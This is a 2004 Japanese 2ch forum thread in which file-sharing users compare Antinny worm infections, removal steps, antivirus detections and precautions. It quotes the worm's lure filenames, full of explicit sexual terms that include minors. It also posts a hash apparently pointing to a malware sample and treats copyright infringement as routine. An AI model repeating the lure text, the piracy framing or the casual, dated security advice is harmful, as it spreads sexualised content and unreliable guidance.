わかりませんが。。
しかし、1/3 だけ消すっていうのは、最初は、良かったという気もしましたが、
少し望みを持たせて、大変なチェック作業に時間をとらせようという作者の
悪意のような気もしてきました。

74 :[名無し]さん(bin+cue).rar:04/09/12 21:23:16 ID:A3lMWte0
尻有集が欲しいのだが、病気入っていないまともなのが
見つからない_| ̄|○

75 :51:04/09/12 21:42:38 ID:tDJFb00U
>>36
なんだかSOHOのような大きな環境ですね。外付けHDが無事だったのは
強運。被害小さくてよかったですね。

私のほうは全HDやられました。一時はどうなるかと思いましたが、結果的
にはシステムもツール郡もほぼ完全に復旧したし、大事なものはバックア
ップがあったし、ついでに余計なものは捨てられたし、大量の音楽ファイル
も少し時間をかければいずれ元通りになる(予定)なので、たちなおりました。

ウイルス作者にはこんなもの作ってないで、世の中のためになるものを
作ってほしいものです。


76 :[名無し]さん(bin+cue).rar:04/09/12 21:59:47 ID:JhrY7Kjx
まあダウソしてる奴が世の中のためになるものをなんていうもんじゃないですよ

77 :[名無し]さん(bin+cue).rar:04/09/12 22:15:43 ID:TNoqscHO
>>75
自分のことは棚に上げっぱなしジャーマンっぽい。

78 :[名無し]さん(bin+cue).rar:04/09/12 22:36:33 ID:5o1uU2ZZ
軍人が「世界が平和でありますように」ってお祈りする様なもんか?

79 :[名無し]さん(bin+cue).rar:04/09/12 22:42:13 ID:5c9jGlxe
軍人といよりテロリ(ry

80 :[名無し]さん(bin+cue).rar:04/09/12 22:44:00 ID:fGg8VddN
それは死にたくないからわりと本気

81 :36:04/09/12 22:45:12 ID:l2gAYMtH
>>51
どうもです。ただ、こちらの場合には、被害が押さえられたとはいえ、ネットに
出回っていないファイルが結構あるので、また1年か2年かけて、コツコツと
バックアップとりながら、作り直します。

(なら、バックアップとっとけ、コラ!という突っ込みはなしで。
愚者は、自分の失敗からしかまなべないので)

アニメとか、エロとかは、結構、出回っていて、自分のHDDが飛んでも、
また集めればいいやと開き直れるところは、まさにp2pの良いところ。
まさにバックアップの理想系。



82 :[名無し]さん(bin+cue).rar:04/09/12 23:13:12 ID:GQg+AVxL
今更キンタマにひっかかってるのに、すごい負け惜しみを書いてるヤツが・・・・

83 :75:04/09/12 23:33:04 ID:tDJFb00U
>>76-78
そうですね。失礼しました。
罪悪感って忘れかけてました。
著作権で飯食ってる人がいるんでした。
(p2pの議論する気はありませんが、私は肯定派)

思い出させてくれてありがとう。以後気をつけます。


84 :白のガンダルフ:04/09/13 00:16:50 ID:0guqwvby
>>83
うむ。
精進するがよい。

85 :[名無し]さん(bin+cue).rar:04/09/13 00:20:58 ID:BheFYJ15
>>83
次はageんなよな

86 :[名無し]さん(bin+cue).rar:04/09/13 00:49:18 ID:5GQwNjOa
>>84
盗人が名乗っていい名前でもないな。それは。

87 :[名無し]さん(bin+cue).rar:04/09/13 00:52:36 ID:XFJS/Mda
ageるなといわれると・・・・ageたくなるのが心情。

88 :[名無し]さん(bin+cue).rar:04/09/13 01:03:49 ID:bGA4mwQJ
sageろブタ

89 :[名無し]さん(bin+cue).rar:04/09/13 01:06:49 ID:CMmhiDBM
感染しました・・・
我が身の甘さに一晩反省。

何がすごいって数ある雑誌の中で一番当たるといわれている某雑誌の占いで
「盗撮に注意」といういくらなんでもないだろう・・という占いが的中したことかな・・
魚座注意!

90 :51=75=83:04/09/13 01:23:06 ID:cvI6ukHi
>85 ageるつもりはなかったです。sage忘れです。
(こんなことだからつまらないウイルスにやられるんだな。Orz)


91 :[名無し]さん(bin+cue).rar:04/09/13 01:35:20 ID:10rwYR5y
>>89
俺も魚座だよ。(´・ω・`)
盗撮もので感染したの?

92 :[名無し]さん(bin+cue).rar:04/09/13 01:56:40 ID:CMmhiDBM
>89
いえいえキンタマに感染したから・・これも盗撮の一種かなって

93 :[名無し]さん(bin+cue).rar:04/09/13 05:56:34 ID:jU7oGLnf
>>92
キンタマに感染したから・・これも盗撮の一種かな
歌丸です

94 :[名無し]さん(bin+cue).rar:04/09/13 07:03:17 ID:ScImh0RW
座布団全部持ってけー

95 :[名無し]さん(bin+cue).rar:04/09/13 10:17:26 ID:EGI+kMvP
ワタクシのHDには、まだ若干の余裕が・・・

96 :[名無し]さん(bin+cue).rar:04/09/13 11:16:20 ID:10rwYR5y
まあ、最近のウイルスでもWebカメラを乗っ取るやつがでてるそうだし。

97 :[名無し]さん(bin+cue).rar:04/09/13 12:20:05 ID:mGcekpHb
もまいら楽しそうだな

98 :[名無し]さん(bin+cue).rar:04/09/13 13:01:23 ID:bfElATy7
前スレの検体提出者です。
本日トレンドマイクロの中の人から電話があり、
「ウイルスと確認されたので次期パターンファイルに追加致します。」
だそうです。

99 :[名無し]さん(bin+cue).rar:04/09/13 13:10:29 ID:10rwYR5y
>>98
すばらすい!

100 :[名無し]さん(bin+cue).rar:04/09/13 13:25:29 ID:mwFPwLKT
今日ウイルススキャンしてたらAntinny.Aっていうウイルスにかかっていました。
でもあまり症状が出てないしexeファイルを踏んだ覚えはないんですが
Antinny.Aってどんな症状が出るもんなんでしょうか?

101 :[名無し]さん(bin+cue).rar:04/09/13 13:37:47 ID:o2gX1szO
>>100
いわゆる、初代ぬるぽ
症状はキャッシュ全消し、めがね男の捏造ファイルばら撒き、win.iniにぬるぽ他

102 :[名無し]さん(bin+cue).rar:04/09/13 13:42:01 ID:o2gX1szO
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_ANTINNY.A&VSect=T
しかし、トレンドのサイトに、これらの言葉が並ぶとは
(テキストだし、ぐぐるとヒットするじゃねーか、せめてイメージにしとけばいいのに)

ファイル名例:
 お宝美少女18才ワレメ04オナニー.rm盗撮主婦マンコ0118禁パイパンM字開脚少年アニメコギャルクリトリス制服.exe
 コンプリート詰め合わせ透け10投稿アナル浣腸お宝名簿コギャルクリトリス乳首08巨乳B'zお笑い成年コミック(ccd).exe
 シングルアニメミニスカート画像露天風呂トイレ第話巻回animeオナニー18禁写真集M字開脚18才07レア更衣室タイピング.exe
 パンツ熟女女子大生中出し田舎レアロリータ月姫02お笑いミニスカート美人.vob巨乳声優洋画妹パイパンかわいい.exe
 マンコラジオ.swf日本語字幕めがねっ娘.NES.avi名簿中出し未発表萌え赤外線美少女APZ映画パンツ詰め合わせジブリ.exe
 マンコ同人誌露天風呂コギャル640x480APZ乳首ワレメスクール水着制服.lzh.avi浣腸女子大生巨乳.mp3.GBAミニスカート.exe
 隠し撮りオナニーGAMEラジオ無修正シリアル付中学生640x480浜崎あゆみシングルレイプ幼女アルバムパイパンパンツ.exe
 映画成年コミック.mp3洋画更衣室.mpg中出し未発表04パイパンアルバム640x480巨乳.GBA.rm着替えフェラパンチラ.exe
 投稿第話巻回コミケM字開脚コギャルエミュレーター個人撮影同人誌モーニング娘。グラビアアイドル巨乳サントラ.exe
 萌え動画(cdi)邦画お宝06サントラ田舎ジブリ裏.MAME露出乳首未発表声優露天風呂妹おもらし女子大生ブルマ看護婦.exe
 名簿ミニスカート0801盗撮コンプリート看護婦レイプ熟女個人情報コミケアルバム住所録美少女04投稿パンツかわいい.exe
 洋画挿入パイパンオナニー乳首コギャル動画ブルマ邦画第話巻回.MAME640x480初回限定エロ奴隷07小学生住所録.exe
 ノーブラブルマ女子大生パイパン同人誌萌え少年.rmシリアル付オナニー触手美人巨乳屈辱露出トイレショタ浣腸.exe
 洋画女子高生おすすめレイプ.GBA投稿かわいい浜崎あゆみグラビアアイドルアニメ18才着替え03(bin+cue).rarビデオ.exe
 熟女.GBA女子高生盗撮08640x480GAME乳首.mpgコンプリート隠し撮りコミケラジオビデオトイレモーニング娘。ヤフオク.exe



103 :[名無し]さん(bin+cue).rar:04/09/13 13:43:33 ID:mwFPwLKT
>>101
さっき隔離したAntinny.Aのファイルを削除しましたがこれ以外にやることありますか?

104 :[名無し]さん(bin+cue).rar:04/09/13 13:48:37 ID:WBqjpyI1
>103
祈れ

105 :[名無し]さん(bin+cue).rar:04/09/13 13:50:22 ID:mwFPwLKT
>>104
どうも

106 :[名無し]さん(bin+cue).rar:04/09/13 13:54:49 ID:XNKKPDso
.zipのファイルを落として極め窓でみると
.mp3とか.aviでした。これはノートンで無反応なんですが
踏まないほうがいいんでしょうか?

107 :[名無し]さん(bin+cue).rar:04/09/13 14:11:49 ID:mYtLqyjC
おれを信じるかノートンを信じるかはおまえの自由だが踏まないほうがいい。

108 :[名無し]さん(bin+cue).rar:04/09/13 14:20:03 ID:dbgSej2E
>>107を信じておけば間違いない

109 :[名無し]さん(bin+cue).rar:04/09/13 15:20:11 ID:VqGLrTgU
>>107にならケツさえも任せられる

110 :[名無し]さん(bin+cue).rar:04/09/13 15:24:27 ID:xx/Q2mUb
いいこと思いついた。>>107お前俺のケツの中にしょんべんしろ

111 :[名無し]さん(bin+cue).rar:04/09/13 15:30:12 ID:mwFPwLKT
Upフォルダ削除したいんですが
http://up.isp.2ch.net/up/a2c4399c8d27.JPG
↑みたいになってて隠しファイルが解除できません。
どうしたらいいでしょうか?

112 :[名無し]さん(bin+cue).rar:04/09/13 15:36:35 ID:XNKKPDso
>>107
とりあえず踏まないように削除しときました。サンクス
こういう偽装ファイルでウィルスってことはありえるんでしょうか?
.zipなのに.mp3だったり.aviだったりに偽装している意味は
やっぱりウィルスだったんでしょうか?これが.exeとかだったしたら
ガクブルものです。.zipはこれからずっと極窓で確認が必要ですか?

113 :111:04/09/13 15:51:39 ID:mwFPwLKT
自己解しました

114 :[名無し]さん(bin+cue).rar:04/09/13 16:11:31 ID:BheFYJ15
>>113
10/10を楽しみにしてなw

115 :[名無し]さん(bin+cue).rar:04/09/13 18:22:55 ID:BHPhC4P0
>>112
>こういう偽装ファイルでウィルスってことはありえるんでしょうか?
 ありうる。.

>zipなのに.mp3だったり.aviだったりに偽装している意味は
 意味はヨクワカンネ。自分の持ってるzipの拡張子をmp3、aviに変えたり
 逆にmp3、avi、exeの拡張子をzipに変えてwクリックしてどうなるか試してみ。

>zipはこれからずっと極窓で確認が必要ですか?
 ん〜、俺は解凍前にアーカイバとかで中身にどんなファイルが
 入ってるか確認すればいいと思うけど。偽装だったら中身
 覗けんから、その時に極窓使用すればよいかと。

116 :[名無し]さん(bin+cue).rar:04/09/13 21:01:34 ID:/wygdGii
無圧縮.zip.mp3 には意味がある。

117 :[名無し]さん(bin+cue).rar:04/09/13 21:09:34 ID:BHPhC4P0
>>116
アルバムっすか。

118 :[名無し]さん(bin+cue).rar:04/09/14 01:02:16 ID:RhtT3Qfw
助けてください。
先程Antinny.Aに感染し、RESTOREというフォルダのA0010718.CPYという
ファイルにAntinny.Aがいます。
SafeModeで起動しても削除できません。
どうすれば削除できますか?
今のところ検出は1件だけです。
お願いします。

119 :[名無し]さん(bin+cue).rar:04/09/14 01:12:32 ID:xa+KBKyw
これか?

ttp://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionId=7260

120 :[名無し]さん(bin+cue).rar:04/09/14 01:15:03 ID:z1cnGRrs
>>119
それだ!

121 :[名無し]さん(bin+cue).rar:04/09/14 01:15:21 ID:mygke+An
>>118
システム復元を無効にすれば、勝手に消えるよ。
つーか、感染環境が既にバックアップされてるんだから
再インスコすればいいのに

122 :118:04/09/14 01:20:17 ID:RhtT3Qfw
>>119
>>120
>>121
解決しました。どうもありがとうございました。
zipを解凍する前にスキャンで検出されていたんですが、
exeを実行しなければなんとかなるかと思っていた自分がバカでした。
これからはもう解凍しません。
夜遅くありがとうございました。

123 :118:04/09/14 01:23:56 ID:RhtT3Qfw
何をしたのか書いてなかったですね。
システム復元を最小にしたらそのファイルも消えました。
ってことはフリーズとかしたらどうなっちゃうのかな?
…ウイルス駆除できたんだから贅沢言っちゃいけませんね。

キャッシュがめがねの人になってるかと思ったのですが、大丈夫でした。
が、他の人のためには今あるキャッシュを消したほうがいいですか?
何度も質問してすみません。


124 :[名無し]さん(bin+cue).rar:04/09/14 01:51:35 ID:04AGAnjI
>>123
当然、削除。

125 :a:04/09/14 10:39:04 ID:+9UvRGr5
Antiny.Jって今流行の解凍ウイルス?
バスターで圧縮ファイルを検索したら出てきた。
駆除できなかったので、隔離後、削除。

126 :[名無し]さん(bin+cue).rar:04/09/14 11:14:21 ID:iR8YFg4M
>>125
解凍ウイルスって?

127 :[名無し]さん(bin+cue).rar:04/09/14 11:16:55 ID:rvJu59Kv
>>125
違う

128 :[名無し]さん(bin+cue).rar:04/09/14 16:49:00 ID:dnonFg0K
>>126
ヌルポーズ

129 :[名無し]さん(bin+cue).rar:04/09/14 18:57:39 ID:tYxEtQzz
0b9bc90f088ecef9f2b098f800a8803d

130 :[名無し]さん(bin+cue).rar:04/09/14 19:18:19 ID:FKmxUeBW
怪盗ウイルス参上!
     ⌒*___*⌒
      〜|・∀・|〜
        |__|
        乂

131 :[名無し]さん(bin+cue).rar:04/09/14 19:38:00 ID:N6TJZSqQ
>>125
あ、それ俺が提出した検体かもorz

132 :[名無し]さん(bin+cue).rar:04/09/14 20:43:10 ID:IULF+3jC

ttp://www.trendmicro.co.jp/vinfo/default.asp?sect=TT

今更ながらAがNO.1獲得してます

133 :[名無し]さん(bin+cue).rar:04/09/14 20:49:12 ID:Vh0ZBmTI
1. HTML_NETSKY.P
と表示される・・・

134 :[名無し]さん(bin+cue).rar:04/09/14 21:16:31 ID:YPv2hXKz
1. HTML_NETSKY.P

2. WORM_ANTINNY.A

3. WORM_NETSKY.Q

4. PE_PARITE.A

5. WORM_NETSKY.P

6. WORM_ANTINNY.G

7. WORM_NETSKY.D

8. JAVA_BYTEVER.A

9. WORM_ANTINNY.J

10. HTML_REDIR.A


135 :[名無し]さん(bin+cue).rar:04/09/14 21:31:31 ID:Ha8OhRhP
デスクトップにタフガイが出てきます!助けてください!

136 :[名無し]さん(bin+cue).rar:04/09/14 21:32:21 ID:mygke+An
時々刻々と変わるみたいだね
1. WORM_ANTINNY.A
2. HTML_NETSKY.P
3. PE_PARITE.A
4. WORM_NETSKY.Q
5. WORM_NETSKY.P
6. WORM_ANTINNY.G
7. WORM_NETSKY.D
8. JAVA_BYTEVER.A
9. WORM_ANTINNY.J
10. HTML_REDIR.A

しかし、NetSkyを超えてるってのと、上位10位にAntinnyが3つも...これはすごいことですなぁ
日本のみのデータとはいえ。アジアでは9位、他地域では圏外


137 :[名無し]さん(bin+cue).rar:04/09/14 21:44:53 ID:11Swtpb8
それってオンラインスキャンの結果ランキングじゃなかったっけ?
実際感染者も多いんだろうが、ny使いがオンラインスキャンする率も高いんだろう
他のワームだと感染してる自覚がなかったりするから

138 :[名無し]さん(bin+cue).rar:04/09/14 21:57:24 ID:ZjY3/3On
バスター最新パターンキタ━━━(゚∀゚)━━━!!!!
パターン 2.172.00
リリース日: 2004/9/14 (日本時間)

で、WORM_ANTINNY.DAMって何?

139 :[名無し]さん(bin+cue).rar:04/09/14 22:03:27 ID:IULF+3jC
<B style="color:black;background-color:#ffff66">WORM_ANTINNY.DAM</B>

140 :[名無し]さん(bin+cue).rar:04/09/14 22:05:36 ID:GDAbphE+
先生はまだかな…

141 :[名無し]さん(bin+cue).rar:04/09/14 22:06:12 ID:IULF+3jC
英語サイトだと取消線入ってるけど何でだろ?

142 :[名無し]さん(bin+cue).rar:04/09/14 23:00:24 ID:ZjY3/3On
>>137
それでも泣きついてくる香具師がいないのは、結構自分でなんとか駆除してるんかねぇ?

143 :[名無し]さん(bin+cue).rar:04/09/15 00:46:58 ID:ZmGfkIX3
すいません。Antinny.Aに感染してるんですが、こういう場合って
システムの復元をやっても意味ないんですか?

144 :[名無し]さん(bin+cue).rar:04/09/15 00:54:34 ID:VTF6zJ8z
>>143
意味ない。さっさとクリーンインスコしろや

お前が被害にあうだけでなく、迷惑振りまいてることを忘れるな。


145 :[名無し]さん(bin+cue).rar:04/09/15 01:16:09 ID:/3rakzi7
Antinnyとやらに感染してしまったんですが
漏れの力量では、駆除できないのよ
こんなバヤイどうしたらよいのでしょうか?

146 :[名無し]さん(bin+cue).rar:04/09/15 01:18:40 ID:hMbkKpFB
再インスコ

147 :145:04/09/15 01:28:17 ID:/3rakzi7
再インスコ とは?


148 :[名無し]さん(bin+cue).rar:04/09/15 01:30:45 ID:Mnl7ykMg
>>147
再インスコもわからないのにnyやるとは・・・勇気あるな。

149 :初心者:04/09/15 01:32:57 ID:TKTUdj76
W32.Antinny.Q をノートン先生が駆除したのですが
ウィルス入りファイルのキャッシュも削除したいのですが如何やって見分けるのですか?

適当に同じくらいのサイズのキャッシュを消すか


150 :[名無し]さん(bin+cue).rar:04/09/15 01:45:16 ID:EqTci4AO
新しいバージョン…の表示が出たけど
7.1なのに今さら…?

151 :[名無し]さん(bin+cue).rar:04/09/15 01:48:07 ID:Q9no2stk
>>150
(´ω`*) Winny総合質問21 (*´ω`)
http://tmp4.2ch.net/test/read.cgi/download/1094999752/

お勉強してからnyつかいな

152 :147:04/09/15 01:49:35 ID:/3rakzi7
>>148
なにぶん当方PC暦1ヶ月なもので
で、再インスコ とはどのような作業を示すの?

153 :[名無し]さん(bin+cue).rar:04/09/15 01:51:42 ID:kG0AbLLN
OSの再インストールだってば!もうnyはやめなさい。て言うかやめて下さい。

154 :[名無し]さん(bin+cue).rar:04/09/15 01:55:31 ID:Mnl7ykMg
次は再インスコの仕方を聞いてくるに1500銭

155 :147:04/09/15 01:56:23 ID:/3rakzi7
>>153
はい

156 :[名無し]さん(bin+cue).rar:04/09/15 02:49:34 ID:MyQkjLBg
>>147
最インスコの前にsageを覚えれ

157 :[名無し]さん(bin+cue).rar:04/09/15 03:25:18 ID:oU9xo6cO
はっ!それだ。
俺の提出した検体が電話でAntiny.DAMに認定されましたとか逝ってたな

158 :175=131:04/09/15 03:31:12 ID:oU9xo6cO
名前欄書き忘れ_| ̄|○

159 :[名無し]さん(bin+cue).rar:04/09/15 03:32:18 ID:P01Nf6vC
しかしPC歴1ヶ月でnyやってAntinny喰らって2chで板違いの上にsageずに質問か

ある意味ツワモノだなw
まぁ夏厨の残り香だろーけど

160 :[名無し]さん(bin+cue).rar:04/09/15 03:32:56 ID:TKTUdj76
質問です。

CDイメージファイルをデーモンでマウントしようとして(自動起動は切ってある)フォルダを開いたとたんにDOS画面になって真っ暗になったと思ったら、普通のマウント画面に戻り
その後マウント、中身をウィルス検索、ウィルス発見、削除したのですが、
イメージファイルが入っているフォルダを開いただけで、実行もしてないのに発動する事があるんでしょうか?

その後全ドライブ検索してもそれらしいウィルスは発見されないのですが・・・
それとも、フォルダを開くときに、反応が鈍くてイライラし、適当に何度もクリックしてしまったのが
原因でなにか別のアプリを起動しちゃっただけなのかな?

161 :[名無し]さん(bin+cue).rar:04/09/15 05:15:09 ID:tjJdJJDO
なんか釣り師ばっかだな。

162 :[名無し]さん(bin+cue).rar:04/09/15 08:04:16 ID:1rbO6aBO
>>149
キャッシュ表示ツールでも何でも使ったらいい

ああ、釣りですか。そうですか

163 :[名無し]さん(bin+cue).rar:04/09/15 09:29:09 ID:kzs2MeKW
Antinny.orz

164 :[名無し]さん(bin+cue).rar:04/09/15 09:34:02 ID:UJrg2gvj
Antinny.ω

165 :[名無し]さん(bin+cue).rar:04/09/15 09:41:09 ID:gNWm1hEk
>>160
フォルダが偽装されていて実行モジュールだったんじゃないの?

166 :[名無し]さん(bin+cue).rar:04/09/15 11:27:39 ID:TKTUdj76
>>161
いや、マジでnyはじめて間もないもんで・・・
でも、なんかガンガンウィルス来るし。

>>162
そうか、ツール系全然調べて無かったわ、アホだ
スマソ

>>165
でも、その前に普通に開いた時は大丈夫だったんですよね。
デーモンで開いたからかな?

167 :[名無し]さん(bin+cue).rar:04/09/15 11:34:38 ID:net0IVc9
166 名前:[名無し]さん(bin+cue).rar[sage] 投稿日:04/09/15 11:27:39 ID:TKTUdj76
>>161
いや、マジでnyはじめて間もないもんで・・・
でも、なんかガンガンウィルス来るし。

168 :[名無し]さん(bin+cue).rar:04/09/15 11:40:23 ID:8KSWkhcc
魚のいない釣堀だな

169 :[名無し]さん(bin+cue).rar:04/09/15 11:50:49 ID:P01Nf6vC
ageんなよ、おめーら

170 :[名無し]さん(bin+cue).rar:04/09/15 13:00:00 ID:ajLDSGbL
>>129
> 0b9bc90f088ecef9f2b098f800a8803d

これ落としてみたけどVB(オンライン)は反応しないね。
AVGは未知のウイルスってことで実行前には必ず反応する。
拡張子の前に空白があるから反応してるっぽいので削ってみたけど実行できないのでやばいんだろうね。
(空白削ったら拡張子はEXEなのにフォルダアイコンになってる…  W2Kなんだけどな…)

171 :[名無し]さん(bin+cue).rar:04/09/15 14:38:03 ID:BYwTHcND
>>166
テンプレを熟読実行、理解できないなら初心者スレにいく。
もしくはやめる。

172 :[名無し]さん(bin+cue).rar:04/09/15 16:01:48 ID:pM0AceH0
>>171
了解、大体わかりました。
自己解決 

流し読みはしたのですが、スマソ。

173 :[名無し]さん(bin+cue).rar:04/09/15 16:38:54 ID:5SNiomkt
jpeg見ただけでexeを実行させられるらしいぞ
対策パッチいれれ

http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040915/149928/

174 :[名無し]さん(bin+cue).rar:04/09/15 16:41:29 ID:dkQvTrUA
>>173
対策パッチ自体がなんかトロイのような技術使ってるのには萎えた。
さすがMS。

175 :[名無し]さん(bin+cue).rar:04/09/15 16:45:05 ID:9vLjGktC
>>173
あー俺それにかかったかも

176 :[名無し]さん(bin+cue).rar:04/09/15 16:49:11 ID:guMLKIPk
やっぱり2kとネスケだな

177 :[名無し]さん(bin+cue).rar:04/09/15 18:08:06 ID:jbPLIK2H
一月くらいまえからAntinny.Lってのに感染してしまったんだが、
なんとかなんないっすか?これといった目に見える被害はないようだが。

178 :[名無し]さん(bin+cue).rar:04/09/15 18:37:17 ID:kClNGeRG
>>177
レッツ再インスコ(・A・)よく嫁!!
デスクトップ画像などを漏洩させる、Antinnyの最新亜種「Antinny.L」
http://internet.watch.impress.co.jp/cda/news/2004/05/26/3246.html

179 :[名無し]さん(bin+cue).rar:04/09/16 03:14:29 ID:UN2fD7DN
デスクトップにフォルダ置いて置かなければ、亜種じゃないキンタマに感染しても
流れるのはデスクトップの画像とユーザー名だけ?
それならユーザー名を実名にしとかなければ問題ないのかな?

180 :[名無し]さん(bin+cue).rar:04/09/16 04:00:52 ID:IoMPofav
>>179
>>178 記事を読んでみ

181 :[名無し]さん(bin+cue).rar:04/09/16 09:50:11 ID:wK/1//8x
Antinny.Aに感染し、検出されたウイルス入りファイルを削除したところ、
スキャンしてもウイルスが検出されなくなりました。

>>102で張られてるリンク先の症状も見当たらないし、
nyのフォルダにうpフォルダとかも見当たらないし、
これで駆除できたってことで大丈夫ですかね??
ご教授お願いします。

182 :[名無し]さん(bin+cue).rar:04/09/16 10:03:36 ID:0dEsX0Tg
>>181
100%Antinny.Aだ!言えるならそれでおk
ただ亜種だったりした場合はシラネ
本人の自由だし、俺はnyウイルス感染した時点で
再インスコ絶対するけどな

183 :[名無し]さん(bin+cue).rar:04/09/16 10:21:06 ID:wK/1//8x
>>182
AVGでスキャンしてるんですが、Antinny.Aと判断されていても
Antinny.Aじゃないってこともあるんでしょうか?
180で書いたような症状は感染してから1度も起こっていないので、
本当にAntinny.Aなのかいまいち自信がありません。

184 :[名無し]さん(bin+cue).rar:04/09/16 12:03:19 ID:1UsxEmo4
>>183
Heuristic scanで似たようなのを拾ってる可能性はあるけれど、亜種が
ひっかかるのかはなんとも言えない。

正直、>>182が言ってくれてるように初期化リカバリーするのが大吉。

185 :[名無し]さん(bin+cue).rar:04/09/16 12:11:02 ID:owhsy+z3
>>173サマ

ありがd!(*^ー^*)

186 :[名無し]さん(bin+cue).rar:04/09/16 18:58:35 ID:uww4rieL
exeをクリックしたら、下のように壁紙が変わっちまったよ・・・
http://wp.aimoudo.net/picbbs02/masa202/img/129.jpg

187 :[名無し]さん(bin+cue).rar:04/09/16 19:07:09 ID:P/2w4DTW
>>186
グロ注意!

188 :[名無し]さん(bin+cue).rar:04/09/16 19:39:32 ID:fAoNFX1/
ちょっと聞きたいんだが、
shareにもantinyみたいなのってあるの?
今日最新のver(A55)解凍してverupしたら
カタログに、その解凍先フォルダが登録されてた。
2.3日まえから脳豚のupdateもできないし、
ひょっとしてふんじゃった?
nyで検索しても自分のファイルないっぽいし・・・。

一応落としたファイルは脳豚&etrustでチェックはしてる、・・・はず。

189 :[名無し]さん(bin+cue).rar:04/09/16 20:45:29 ID:HcElDh11
>>186
これ・・・入るのか?

190 :[名無し]さん(bin+cue).rar:04/09/16 20:51:03 ID:WXlcGZ+z
そういや壁紙がエロゲのCGになって変更できなくなる、っつーのもあったな。

191 :[名無し]さん(bin+cue).rar:04/09/16 20:55:04 ID:WYUKMOl2
>>188
それはwinny/shareワームにも対応してイナイ、イクナイノートン先生だか
らです。最新版の脳豚インターネットセキュリティなら安心! 10/15発売。
さらに、今回のバージョンから釣りに対応。これで「お前はまた騙されたわ
けだが」のスレをクリックしても大丈夫です。
(一部脳内妄想が混じってます)













今回のバージョンからプロダクトアクティベーションが採用されます/本当( ;゚Д゚)
24桁もあってゲンナリ

192 :[名無し]さん(bin+cue).rar:04/09/16 20:57:50 ID:BUSp181Z
壁紙、蓮コラもある。

193 :[名無し]さん(bin+cue).rar:04/09/16 23:07:05 ID:pej4hnR7
踏んじゃった
どうやら初期のようですぐ削除できたっぽいけど
なんかキモイ顔写真やらダウンロードしたファイルが流れそうになっただけで大丈夫っぽい

194 :[名無し]さん(bin+cue).rar:04/09/17 00:58:40 ID:7Ru9jBeZ
>>193
ぬるぽ?
キンタマ?

195 :[名無し]さん(bin+cue).rar:04/09/17 01:08:27 ID:FqGBcRna
>>194
ガッ

196 :[名無し]さん(bin+cue).rar:04/09/17 17:42:52 ID:L8CabldY
>>186

のグロ絵ってどんな絵
教えて、先生。

197 :[名無し]さん(bin+cue).rar:04/09/17 17:57:25 ID:UiTGH72N
よろしく!IMチョーダイ553_12526
とは交換しない方がいい

198 :[名無し]さん(bin+cue).rar:04/09/17 18:12:39 ID:Jkdwb/Vn
>>197
( ´_ゝ`)フーン、、、

199 :[名無し]さん(bin+cue).rar:04/09/17 18:47:34 ID:ZaBsaSfe
アンチウイルスソフトでスキャン
オンラインスキャン
極窓で拡張子判別
圧縮ファイルは解凍前に中身を確認

落としたファイルをクリックする前にこれのほかにしといたほうがいいことありますか?

200 :[名無し]さん(bin+cue).rar:04/09/17 19:01:46 ID:HveayeTh
>>199 正攻法ならSSMの導入 delexeの導入
    絡めていくならny専用機でやるとか

201 :[名無し]さん(bin+cue).rar:04/09/17 19:11:33 ID:kHnzWPzJ
>>196

デブバラの祖チンから汚汁の図

202 :[名無し]さん(bin+cue).rar:04/09/17 19:29:52 ID:0UzWlmcU
みんな更新日時とか見てる?圧縮された中身の
更新日時がヌルポースとかが出る前だったら
ノートンで何とかなるだろとか思うときがあるんだけど。
意味ないかな?

203 :[名無し]さん(bin+cue).rar:04/09/17 19:39:45 ID:XDnVXp6k
>>202
更新日時など、いくらでも簡単に変更できる。
意味ないべ。

204 :[名無し]さん(bin+cue).rar:04/09/17 19:59:22 ID:t31qD9kK
Antinny.Jを検出したのですが、VBが処理できないみたいなんです
どうすればいいですかね?


205 :[名無し]さん(bin+cue).rar:04/09/17 20:01:50 ID:0UzWlmcU
>>203
マジでか?
まぁウィルス踏んだことはまだないから
これから気をつけます。

206 :[名無し]さん(bin+cue).rar:04/09/17 20:08:35 ID:8KPpvB9p
>>204
VBが処理できないって、具体的にどういうメッセージがでたんだ?

207 :[名無し]さん(bin+cue).rar:04/09/17 20:09:45 ID:t31qD9kK
>>206
そのまま「ウィルスを処理できません」と出ました
最新版にアップデートはしてあります

208 :[名無し]さん(bin+cue).rar:04/09/17 20:16:32 ID:8KPpvB9p
>>207
ウイルスログにはなんて出てる?

209 :[名無し]さん(bin+cue).rar:04/09/17 20:17:48 ID:7Ru9jBeZ
>>207
感染しちゃったら
とりあえず
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_ANTINNY.J

ダメなら・・・

210 :[名無し]さん(bin+cue).rar:04/09/17 20:27:25 ID:t31qD9kK
ダメ元で、ウィルスが入ってたであろうフォルダを削除して
もう一度検索したら、検出されなくなりました
もしダメだったら再インスコしてみますね 失礼しました

211 :[名無し]さん(bin+cue).rar:04/09/17 21:50:52 ID:3lnlo8zt
>>200
横レスすみません
こちらで皆さまの博識をお頼りしてるのですが
SSMとdelexeがわかりません・・・(;´д⊂ヽ
よろしければ教えていただけないでしょうか

212 :[名無し]さん(bin+cue).rar:04/09/17 21:54:24 ID:uqJP2qR2
>>211
http://www.geocities.co.jp/Outdoors-Mountain/9671/ssm/
http://a-t-software.hp.infoseek.co.jp/apps/delexe/

213 :211:04/09/17 22:07:58 ID:3lnlo8zt
>>212
速レス&リンクありがとうございました
すごく助かりました!感謝いたしますです<(_ _)>ぺこり


214 :[名無し]さん(bin+cue).rar:04/09/18 00:21:41 ID:etfW40cx
キンタマ感染していも、実際個人データが流失しない人と、実際流れてしまう人の違いはなに?
ポト0とそうじゃない人の違いかな・・・・。

215 :[名無し]さん(bin+cue).rar:04/09/18 00:22:58 ID:Nip6NdZR
あげんなよそんなことで。
感染したことに気づくかどうかだろ。

216 :214+:04/09/18 00:24:50 ID:etfW40cx
いや、これはとても重要なことなので上げる

217 :[名無し]さん(bin+cue).rar:04/09/18 00:27:30 ID:qF+5z9DN
>>214
俺の場合ny1の環境を残したまま、ny2を使ってたが、
ny1の方に流出トラップ仕掛けられてた。
よって、感染はしたが個人情報流出はしなかった。

218 :[名無し]さん(bin+cue).rar:04/09/18 00:32:13 ID:ftgx9+dl
>>216
お前にとって重要でも
お前以外の奴には重要でも何でも無いことだ
いちいちあげんな

219 :214+:04/09/18 00:45:43 ID:etfW40cx
